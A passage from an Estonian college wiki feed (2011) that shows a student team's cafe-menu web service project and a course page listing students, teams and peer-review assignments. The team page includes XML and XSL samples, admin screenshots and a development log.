            &amp;lt;/kohvik&amp;gt;&lt;br /&gt;
            &amp;lt;kohvik name=&amp;quot;TTY KOHVIK&amp;quot; staatus=&amp;quot;Parim koht&amp;quot;&amp;gt;&lt;br /&gt;
                    &amp;lt;toit tyyp=&amp;quot;praad&amp;quot;&amp;gt;&lt;br /&gt;
                            &amp;lt;pilt&amp;gt;&lt;br /&gt;
                                    &amp;lt;url width=&amp;quot;100&amp;quot; height=&amp;quot;100&amp;quot;&amp;gt;http://www.neti.ee/pilt2.jpg&amp;lt;/url&amp;gt;&lt;br /&gt;
                            &amp;lt;/pilt&amp;gt;&lt;br /&gt;
                            &amp;lt;pealkiri&amp;gt;seapraad&amp;lt;/pealkiri&amp;gt;&lt;br /&gt;
                            &amp;lt;kirjeldus&amp;gt;seentega&amp;lt;/kirjeldus&amp;gt;&lt;br /&gt;
                            &amp;lt;poolhind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;200&amp;lt;/poolhind&amp;gt;&lt;br /&gt;
                            &amp;lt;tervehind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;420&amp;lt;/tervehind&amp;gt;&lt;br /&gt;
                            &amp;lt;allahindlus&amp;gt;10%&amp;lt;/allahindlus&amp;gt;&lt;br /&gt;
                            &amp;lt;kehtib&amp;gt;31.03.2011&amp;lt;/kehtib&amp;gt;&lt;br /&gt;
                            &amp;lt;liked&amp;gt;2&amp;lt;/liked&amp;gt;&lt;br /&gt;
                    &amp;lt;/toit&amp;gt;&lt;br /&gt;
            &amp;lt;/kohvik&amp;gt;&lt;br /&gt;
    &amp;lt;/kohvikud&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== XSL ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;xsl:stylesheet version=&amp;quot;1.0&amp;quot;&lt;br /&gt;
xmlns:xsl=&amp;quot;http://www.w3.org/1999/XSL/Transform&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;xsl:template match=&amp;quot;/&amp;quot;&amp;gt;&lt;br /&gt;
	&amp;lt;html&amp;gt;&lt;br /&gt;
	&amp;lt;body&amp;gt;&lt;br /&gt;
	&amp;lt;h2&amp;gt;Kohvikud&amp;lt;/h2&amp;gt;&lt;br /&gt;
	&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
		&amp;lt;tr bgcolor=&amp;quot;#9acd32&amp;quot;&amp;gt;&lt;br /&gt;
			&amp;lt;th&amp;gt;Nimi&amp;lt;/th&amp;gt;&lt;br /&gt;
			&amp;lt;th&amp;gt;Staatus&amp;lt;/th&amp;gt;&lt;br /&gt;
		&amp;lt;th&amp;gt;Menüü&amp;lt;/th&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;xsl:for-each select=&amp;quot;kohvikud/kohvik&amp;quot;&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;@name&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
			&amp;lt;td valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;@staatus&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;td valign=&amp;quot;top&amp;quot;&amp;gt;&lt;br /&gt;
			&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
			 &amp;lt;tr bgcolor=&amp;quot;#2acd32&amp;quot;&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Pealkiri&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Väike portsjon&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Täis portsjon&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Soodustus&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Kehtib&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Kirjeldus&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Laike&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Pildid&amp;lt;/td&amp;gt;&lt;br /&gt;
			 &amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;xsl:for-each select=&amp;quot;./toit&amp;quot;&amp;gt;&lt;br /&gt;
			&amp;lt;tr&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;pealkiri&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;poolhind&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;tervehind&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;allahindlus&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;kehtib&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;kirjeldus&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;liked&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&lt;br /&gt;
					&amp;lt;xsl:for-each select=&amp;quot;./pilt&amp;quot;&amp;gt;&lt;br /&gt;
						&amp;lt;xsl:value-of select=&amp;quot;url&amp;quot;/&amp;gt;&lt;br /&gt;
					&amp;lt;/xsl:for-each&amp;gt;&lt;br /&gt;
				&amp;lt;/td&amp;gt;&lt;br /&gt;
			&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;/xsl:for-each&amp;gt;&lt;br /&gt;
		&amp;lt;/table&amp;gt;&lt;br /&gt;
		&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;/xsl:for-each&amp;gt;&lt;br /&gt;
	&amp;lt;/table&amp;gt;&lt;br /&gt;
	&amp;lt;/body&amp;gt;&lt;br /&gt;
	&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/xsl:template&amp;gt;&lt;br /&gt;
&amp;lt;/xsl:stylesheet&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== ASP.Net aine raames adminni sisuhaldus ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Nagu eelpool mainitud, kasutame MVC3 raamistikku, andmeid liigutab LINQ to entities.&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kasutajal tuleb autentida, selleks on aspi enda membership lahendus.&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_login.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Menüüde halduse esileht&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_front.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kohvikute vaade, üldadmin näeb kõiki kohvikuid, tavaadmin ainult temaga seostatud kohvikuid&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_cafes_front.png]]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Igal kohvikul on enda tooted..&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_tooted_front.png]]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;..mille sisestamine näeb välja selline:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_edit_product.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Tooteid saab luua, kustutada ja välja lülitada (viimane toimub ajaxiga).&lt;br /&gt;
&lt;br /&gt;
Tootel on küljes kehtivus kuupäev, vastavalt millele genereeritakse menüü. Menüüs on iga päeva peal toode, mis sel päeval kehtib.&lt;br /&gt;
&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_menufilter.png]]&lt;br /&gt;
&lt;br /&gt;
== Logi ==&lt;br /&gt;
=== 16. Mai ===&lt;br /&gt;
Finaalesitlus&lt;br /&gt;
&lt;br /&gt;
=== 13. Mai ===&lt;br /&gt;
Ebaõnne päev ja lõpusirge arendus!&lt;br /&gt;
&lt;br /&gt;
===  6. Mai === &lt;br /&gt;
Desktopvaate analüüs &lt;br /&gt;
töölauakliendi jooksutamiseks on vaja Python 2.7.1 ning PyQt4 4.8.4&lt;br /&gt;
&lt;br /&gt;
=== 29. Aprill ===&lt;br /&gt;
Veebiteenuse parendamine&lt;br /&gt;
&lt;br /&gt;
=== 22. Aprill ===&lt;br /&gt;
Konkurendiga koostöö lepingu sõlmimine, koodivahetus.&lt;br /&gt;
&lt;br /&gt;
=== 18. Aprill ===&lt;br /&gt;
Teenuse presentatsioon, karm tagasiside ehk esimese testimis tulemuste analüüs ja iteratiivse arenguga jätkamine&lt;br /&gt;
&lt;br /&gt;
=== 15-17. Aprill ===&lt;br /&gt;
Veebiteenuse lõpu sprint&lt;br /&gt;
Andmebaasi lisatud tabel, mis korjab statistikat&lt;br /&gt;
&lt;br /&gt;
===  8. Aprill ===&lt;br /&gt;
Arendus Sprint &lt;br /&gt;
*määramatusest tulenevad probleemid&lt;br /&gt;
*vaate toorik&lt;br /&gt;
*versiooni halduse&lt;br /&gt;
&lt;br /&gt;
===  4. Aprill ===&lt;br /&gt;
Alamprojekt baasitäitmiseks&lt;br /&gt;
&lt;br /&gt;
=== 18. Märts ===&lt;br /&gt;
Andmebaasi lihvimine, teenuse toorik.&lt;br /&gt;
Projektijuht 2 nädalat komandeeringus, arenduse koordinaator sinisel lehel.&lt;br /&gt;
&lt;br /&gt;
=== 15. Märts ===&lt;br /&gt;
Töötav andmebaas, metsikud vaevad versioonihaldusega.&lt;br /&gt;
===  7. Märts ===&lt;br /&gt;
Rühmatöö ettevalmistused ja ümberkorraldused: MVC3 (Razor view engine) ja MSSQL SERVER 2008 R2 asendamine. Versioonihalduseks Mercurial HG. &lt;br /&gt;
===  1. Märts ===&lt;br /&gt;
Andmediagrammi esialgsed kavandid, et sobiks xmliga kokku.&lt;br /&gt;
&lt;br /&gt;
=== 23. Veebruar ===&lt;br /&gt;
Tekkisid määramatusest tulenevad probleemid, haigestumine ja riigipühad.&lt;br /&gt;
Xml ja Xsl valmis, Schema vajab täiendusi.&lt;br /&gt;
&lt;br /&gt;
=== 17. Veebruar ===&lt;br /&gt;
Projekti kavand pandi paika ja jaotati esialgsed töö ülesanded.&lt;br /&gt;
Esialgse Xml&#039;i draft, endiselt arenduses.&lt;br /&gt;
&lt;br /&gt;
=== 16. Veebruar ===&lt;br /&gt;
Drastilised muudatused arendus tööriistade valikul. Põhi osa programmist luuakse Pythoniga .NET raamistikus, aga kliendi liides tehakse ikkagi asp.net&#039;iga.&lt;br /&gt;
&lt;br /&gt;
=== 14. Veebruar ===&lt;br /&gt;
Meeskonna nime valik ja wiki lehe alustamine.&lt;br /&gt;
&lt;br /&gt;
=== 7. Veebruar ===&lt;br /&gt;
Arendus vahenditega tutvumine, kuidas teha, mida teha. Palju metadata kogumist.&lt;br /&gt;
&lt;br /&gt;
=== 2. Veebruar ===&lt;br /&gt;
Uue meeskonna moodustamine ja idee kujunemine&lt;br /&gt;
&lt;br /&gt;
[[Category: Võrgurakendused II: hajussüsteemide ehitamine]]&lt;br /&gt;
[[Category: Veebirakenduste loomine ASP.NET abil]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=V%C3%B5rgurakendused_II:_2011_kevadel_valminud_kodut%C3%B6%C3%B6d&amp;diff=33759</id>
		<title>Võrgurakendused II: 2011 kevadel valminud kodutööd</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=V%C3%B5rgurakendused_II:_2011_kevadel_valminud_kodut%C3%B6%C3%B6d&amp;diff=33759"/>
		<updated>2011-06-05T21:29:06Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Tanel Liiv */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Jaan Igamees=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kert Suvi=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Helen Muidik=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Mihkel Sokk=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Seda Sahradyan=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Priit Siimo=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond_%22Tyhik%22]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_%22Tyhik%22]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond_%22Hungry_Student_Food_Board%22]]&lt;br /&gt;
&lt;br /&gt;
=Siim Sarv=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;Hungry Student Food Board&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Reigo Männiste=&lt;br /&gt;
* Meeskond [[Meeskond Tool]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Karl Männil=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Ilmar Telga=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;Hungry Student Food Board&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Siim Aaver=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Taavi Ilves=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Hungry_Student_Food_Board&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond_&amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Jaan Kruusma=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Hungry_Student_Food_Board&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Andrus Reedla=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Jaak Lehtsalu=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Jana Mrots=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond  &amp;quot;Hungry Student Food Board&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Heiki Tamm=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Meeskond&amp;quot;]]&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond  &amp;quot;Hungry Student Food Board&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Toomas Soha=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond_%22Tyhik%22]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_%22C_terav%22]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Miina Sikk=&lt;br /&gt;
* Meeskond [[Meeskond Tool]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Rauno Rüga=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
&lt;br /&gt;
=Tanel Liiv=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Hungry Student Food Board&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Gaspar Karm=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Joosep Ilves=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_&amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Taivo Türnpu=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Sander Baikov=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Allar Anijago=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tool&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Madis Sarv=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_Tool]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Kaspar Kallasmaa=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Jarko Kaskmaa=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond_%22H2%22]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_%22H2%22]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Indrek Kõue=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Erik Kaju=&lt;br /&gt;
* Meeskond [[Meeskond Tool]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Mailis Toompuu=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Madis Kõosaar=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
